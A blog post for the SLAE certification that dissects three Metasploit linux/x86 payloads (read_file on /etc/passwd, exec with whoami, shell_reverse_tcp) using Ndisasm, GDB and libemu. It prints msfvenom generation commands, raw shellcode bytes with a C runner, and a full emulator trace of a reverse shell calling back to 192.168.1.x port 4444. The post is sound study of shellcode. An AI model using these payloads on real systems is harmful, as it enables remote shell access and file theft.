Assignment

  • Take up at least 3 shellcode samples created using Msfpayload for linux/x86
  • Use GDB/Ndisasm/Libemu to dissect the functionality of the shellcode
  • Present your analysis

Shellcode – linux/x86/read_file (Ndisasm)

Starting simple we chose the read_file payload from msfvenom. A quick look at the options shows us the file descriptor is set to 1 by default which is STDOUT so we only need to supply the path variable to generate our shellcode.

suls@kali:~/slae/Assignment-5$ msfvenom -p linux/x86/read_file --list-options
Options for payload/linux/x86/read_file:
=========================


       Name: Linux Read File
     Module: payload/linux/x86/read_file
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 62
       Rank: Normal

Provided by:
    hal

Basic options:
Name  Current Setting  Required  Description
----  ---------------  --------  -----------
FD    1                yes       The file descriptor to write output to
PATH                   yes       The file path to read

Description:
  Read up to 4096 bytes from the local file system and write it back 
  out to the specified file descriptor

We generate our shellcode with the command seen below.

msfvenom -p linux/x86/read_file PATH=/etc/passwd -f raw -o read_file_shellcode 

Then disassemble the shellcode using Ndisasm

cat read_file_shellcode | ndisasm -u -

In line analysis of the shellcode is provided below however at a high level the following syscalls are made in order to open, read and write the file to STDOUT.

  • open(“/etc/passwd”, 0)
  • read(int fd, void *buf, 4096)
  • write(int fd, const void *buf, size_t count);
  • exit(0)
00000000  EB36              jmp short 0x38               # Jump to 00000038 which calls 0x2 (JMP-CALL-POP technique) 
                                                         # Stores the address of the file path starting at 0000003D
00000002  B805000000        mov eax,0x5                  # Syscall 5 = Open 
00000007  5B                pop ebx                      # Pop filepath to EBX (0000003D)
00000008  31C9              xor ecx,ecx                  # Zero ecx 
0000000A  CD80              int 0x80                     # Syscall open(const char *pathname, int flags); 
0000000C  89C3              mov ebx,eax                  # Move file describer returned to edb by previous syscall descriptor to ebx
0000000E  B803000000        mov eax,0x3                  # Store 3 in eax = read syscall 
00000013  89E7              mov edi,esp 
00000015  89F9              mov ecx,edi                  # Point ECX to the top of the stack = Location to save read bytes 
00000017  BA00100000        mov edx,0x1000               # Store 4096 as the number of bytes to read 
0000001C  CD80              int 0x80                     # Syscall = read(int fd, void *buf, size_t count);
0000001E  89C2              mov edx,eax                  # Store number of bytes read in edx  
00000020  B804000000        mov eax,0x4                  # Set eax to 4 = syscall write 
00000025  BB01000000        mov ebx,0x1                  # Set ebx to 1 = File describer STDOUT 
0000002A  CD80              int 0x80                     # Sycall = write(int fd, const void *buf, size_t count);
0000002C  B801000000        mov eax,0x1                  # Syscall 1 = Exit 
00000031  BB00000000        mov ebx,0x0                  # Return code 0 
00000036  CD80              int 0x80                     # Syscall 1 = Clean exit 
00000038  E8C5FFFFFF        call 0x2                     # Call 0x2, call part of JMP-CALL-POP sequence
0000003D  2F                3                            # Remaining code is the file path /etc/passwd
0000003E  657463            gs jz 0xa4
00000041  2F                das
00000042  7061              jo 0xa5
00000044  7373              jnc 0xb9
00000046  7764              ja 0xac
00000048  00                db 0x00

Shellcode – linux/x86/exec (GDB)

For our second shellcode we are reviewing the metasploit linux/x86/exec generated shellcode with GDB. Firstly we generate our shellcode with msfvenon:

msfvenom -p linux/x86/exec -f c CMD=whoami  
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 42 bytes
Final size of c file: 201 bytes
unsigned char buf[] = 
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77"
"\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80";

We paste this into our shellcode.c program in order to compile and execute the code:

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
"\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x07\x00\x00\x00\x77"
"\x68\x6f\x61\x6d\x69\x00\x57\x53\x89\xe1\xcd\x80";

int main()
{
	int (*ret)() = (int(*)())code;
	ret();
}

We then compile and test:

Next we run via GDB and break and disassemble the code:

./gdb shellcode_GDB
break *&code
set disassemably-flavor intel 
run
Breakpoint 1, 0x0804a040 in code ()
(gdb) disassemble 
Dump of assembler code for function code:
=> 0x0804a040 <+0>:	push   0xb
   0x0804a042 <+2>:	pop    eax
   0x0804a043 <+3>:	cdq    
   0x0804a044 <+4>:	push   edx
   0x0804a045 <+5>:	pushw  0x632d
   0x0804a049 <+9>:	mov    edi,esp
   0x0804a04b <+11>:	push   0x68732f
   0x0804a050 <+16>:	push   0x6e69622f
   0x0804a055 <+21>:	mov    ebx,esp
   0x0804a057 <+23>:	push   edx
   0x0804a058 <+24>:	call   0x804a064 <code+36>
   0x0804a05d <+29>:	ja     0x804a0c7
   0x0804a05f <+31>:	outs   dx,DWORD PTR ds:[esi]
   0x0804a060 <+32>:	popa   
   0x0804a061 <+33>:	ins    DWORD PTR es:[edi],dx
   0x0804a062 <+34>:	imul   eax,DWORD PTR [eax],0xe1895357
   0x0804a068 <+40>:	int    0x80
   0x0804a06a <+42>:	add    BYTE PTR [eax],al
End of assembler dump.

Of interest is the syscall at 0x0804a068, so we set a break point here with:

break *0x0804a068
continue

Reviewing the registers we find the following:

(gdb) info registers 
eax            0xb	11
ecx            0xbfffee2e	-1073746386
edx            0x0	0
ebx            0xbfffee3e	-1073746370
esp            0xbfffee2e	0xbfffee2e
ebp            0xbfffee68	0xbfffee68
esi            0xb7fba000	-1208246272
edi            0xbfffee46	-1073746362
eip            0x804a068	0x804a068 <code+40>
eflags         0x286	[ PF SF IF ]
cs             0x73	115
ss             0x7b	123
ds             0x7b	123
es             0x7b	123
fs             0x0	0
gs             0x33	51

This indicates that the execve syscall is being made due to eax being 11. Review of the man page for execve details the parameters passed.

Examining the memory at 0xbfffee3e (EBX) we can see the first argument is /bin/sh:

(gdb) x/1s  0xbfffee3e
0xbfffee3e:	"/bin/sh"

I was struggling to work out the string array at ECX via GDB alone so installed the PEDA extension to make things a little clearer. Using PEDA we can see the array of arguments passed to to the syscall are on the stack at 0xbfffee2e “/bin/sh”, ‘-c’ and “whoami” respectively:

Finally EDX is 0x0 for the ENVP variable, which conculdes our analysis, the resulting command being:

execve("/bin/sh",["/bin/sh",'-c',"whoami"],0) 

Shellcode – linux/x86/shell_reverse_tcp (libemu)

For our final shellcode we are analysing the metasploit linux/x86/shell_reverse_tcp shellcode with libemu, We generate the shellcode to a raw file with the following command:

linux/x86/shell_reverse_tcp RPORT=4444 RHOST=192.168.1.1 -o shell-reverse-tcp

We use the following guide to install libemu within our Ubuntu VM, https://www.doyler.net/security-not-included/libemu-installation and proceed to analyse the shellcode with the following command:

cat shell-reverse-tcp | sctest -vvv -Ss 100000 verbose=3

This provides us with the following breakdown of the code:

[emu 0x0x85b7480 debug ] cpu state    eip=0x00417000
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417000
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 31DB                            xor ebx,ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417002
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] F7E3                            mul ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417004
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417005
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x85b7480 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] 43                              inc ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417006
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417007
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 6A02                            push byte 0x2
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417009
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041700b
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] B066                            mov al,0x66
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041700d
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int socket(int domain=2, int type=1, int protocol=0);
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041700f
[emu 0x0x85b7480 debug ] eax=0x0000000e  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 93                              xchg eax,ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417010
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00416fc2  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 59                              pop ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417011
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] B03F                            mov al,0x3f
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417013
[emu 0x0x85b7480 debug ] eax=0x0000003f  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=2);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417015
[emu 0x0x85b7480 debug ] eax=0x00000002  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 49                              dec ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417016
[emu 0x0x85b7480 debug ] eax=0x00000002  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 79F9                            jns 0xfffffffb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417011
[emu 0x0x85b7480 debug ] eax=0x00000002  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] B03F                            mov al,0x3f
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417013
[emu 0x0x85b7480 debug ] eax=0x0000003f  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=1);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417015
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: 
[emu 0x0x85b7480 debug ] 49                              dec ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417016
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] 79F9                            jns 0xfffffffb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417011
[emu 0x0x85b7480 debug ] eax=0x00000001  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] B03F                            mov al,0x3f
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417013
[emu 0x0x85b7480 debug ] eax=0x0000003f  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=0);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417015
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF ZF 
[emu 0x0x85b7480 debug ] 49                              dec ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417016
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 79F9                            jns 0xfffffffb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417018
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 68C0A80185                      push dword 0x8501a8c0
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041701d
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 680200115C                      push dword 0x5c110002
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417022
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417024
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] B066                            mov al,0x66
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417026
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 50                              push eax
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417027
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fba  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 51                              push ecx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417028
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fb6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417029
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] B303                            mov bl,0x3
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041702b
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041702d
[emu 0x0x85b7480 debug ] eax=0x00000066  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
connect
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041702f
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 52                              push edx
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417030
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fae  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 686E2F7368                      push dword 0x68732f6e
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417035
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416faa  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 682F2F6269                      push dword 0x69622f2f
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703a
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x85b7480 debug ] esp=0x00416fa6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 89E3                            mov ebx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703c
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416fa6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 52                              push edx
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703d
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416fa2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 53                              push ebx
[emu 0x0x85b7480 debug ] cpu state    eip=0x0041703e
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 89E1                            mov ecx,esp
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417040
[emu 0x0x85b7480 debug ] eax=0x00000000  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] B00B                            mov al,0xb
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417042
[emu 0x0x85b7480 debug ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] CD80                            int 0x80
execve
int execve (const char *dateiname=00416fa6={//bin/sh}, const char * argv[], const char *envp[]);
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417044
[emu 0x0x85b7480 debug ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
[emu 0x0x85b7480 debug ] 0000                            add [eax],al
cpu error error accessing 0x00000004 not mapped

stepcount 42
[emu 0x0x85b7480 debug ] cpu state    eip=0x00417046
[emu 0x0x85b7480 debug ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x85b7480 debug ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x85b7480 debug ] Flags: PF SF 
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int dup2 (
     int oldfd = 14;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 14;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 14;
     int newfd = 0;
) =  0;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 23569 (port=4444);
             struct in_addr sin_addr = {
                 unsigned long s_addr = -2063488832 (host=192.168.1.133);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;
int execve (
     const char * dateiname = 0x00416fa6 => 
           = "//bin/sh";
     const char * argv[] = [
           = 0x00416f9e => 
               = 0x00416fa6 => 
                   = "//bin/sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;

We also create a PNG graph of the shellcode as follows:

cat shell-reverse-tcp | sctest -vvv -Ss 100000 -G shell-reverse-tcp.dot
dot shell-reverse-tcp.dot -Tpng -o shell-reverse-tcp.png

Unsurprisingly given our work on Assignment 2 the libemu break down and graph shows us the following actions taken:

  • Create a socket
  • Duplicate STDERR, STDOUT and STDIN to the created socket
  • Connect to 192.168.1.1 Port 4444
  • Execute /bin/sh via execve

This completes assignment five, source code is available on GitHub https://github.com/su1s/SLAE

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1436

One thought on “SLAE Assignment 5 – Shellcode Analysis

  1. […] outputting it with the IV and Key. So we take the linux/x86/exec whoami shellcode we analysed in Assignment 5 with GDB and pass it to the crypter as seen […]

Leave a Reply to SLAE Assignment 7 – Custom Crypter – suls.co.uk Cancel reply

Your email address will not be published. Required fields are marked *